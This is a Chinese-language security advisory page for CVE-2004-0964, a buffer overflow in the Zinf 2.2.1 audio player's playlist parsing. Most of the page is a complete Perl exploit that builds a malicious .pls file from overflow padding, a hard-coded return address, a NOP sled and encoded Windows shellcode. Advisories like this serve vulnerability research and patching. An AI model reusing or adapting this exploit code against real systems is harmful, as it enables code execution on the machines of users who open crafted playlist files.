安全研究
安全漏洞
Zinf畸形播放列表文件远程缓冲器溢出漏洞
发布日期:2004-09-24
更新日期:2009-01-30
受影响系统:
Zinf Zinf 2.2.1描述:
BUGTRAQ ID: 11248
CVE ID: CVE-2004-0964
Zinf是Linux和Windows平台上的音频播放器。
Zinf在处理畸形播放列表文件的实现上存在安全漏洞,可导致非法访问受影响计算机。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://www.securityfocus.com/archive/1/376305
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8 push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";
my $file="hsmx.pls";
$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";
建议:
厂商补丁:
Zinf
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zinf.org
浏览次数:1745
严重程度:0(网友投票)
绿盟科技给您安全的保障